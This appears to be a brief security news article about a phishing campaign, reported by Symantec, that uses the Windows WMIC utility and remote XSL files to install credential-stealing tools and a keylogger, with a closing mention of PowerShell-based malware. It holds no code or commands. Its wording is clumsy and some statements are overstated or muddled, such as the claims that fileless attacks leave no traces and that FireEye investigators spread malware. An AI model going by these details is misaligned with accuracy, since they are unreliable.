A new malware uses Windows utility for data theft
WMIC-based payloads emphasize the cunning tricks of attackers who use undeleterious system operations to take roots into Windows devices.
Investigators have detected a new threat that makes use of relatively unknown Microsoft Windows utilities and harmless software to remain invisible for stealing sensitive information of a certain user.
As Symantec informed, the new malware attack’s mechanism consists in “living off the land”.
What does it mean? Hackers are now using the already installed legitimate resources of a device they want to steal information from. Such attacks can be called fileless, because no files are damaged. No traces are left at all. So, minimum risk of being detected.
A new danger chain uses exactly this technique to attack.
Symantec also stressed that this campaign exploits the Windows Management Instrumentation Command-line (WMIC) utility that is a special tool of Microsoft Windows devices.
This authentic tool makes available a command-line interface for the Windows Management Interface (WMI) that is used for administrative purposes as well as for query system settings, control processes and execute scripts.
Combined with eXtensible Stylesheet Language (XSL) files, this complex represents a part of a multi-step attack to hack information from Windows devices.
This attack involves a phishing campaign with a link distributed via URL. Clicking on this fake link will lead to download of a malicious XSL file from a remote server.
The payload contains numerous modules to steal sensitive information, for instance, the MailPassview utility for intercepting email password, WebBrowser Passview software for collecting web browser information, a keylogger, etc.
According to Symantec, it isn’t a new malware, it’s a usual mechanism for propagation, but in this situation the function is another: to download a malicious file. The use of WMIC allows hackers to remain undetected and provides with a rather serious tool to perform their ill-intentioned plans.
In January, investigators from FireEye informed that they were practicing in finding out the weaknesses in Microsoft Office by distributing the malware with ability to steal sensitive information, to perform cryptocurrency mining and launching denial-of-service (DDoS) attacks.
This campaign uses PowerShell to take roots (in this case, to drop malware payloads) into vulnerable systems.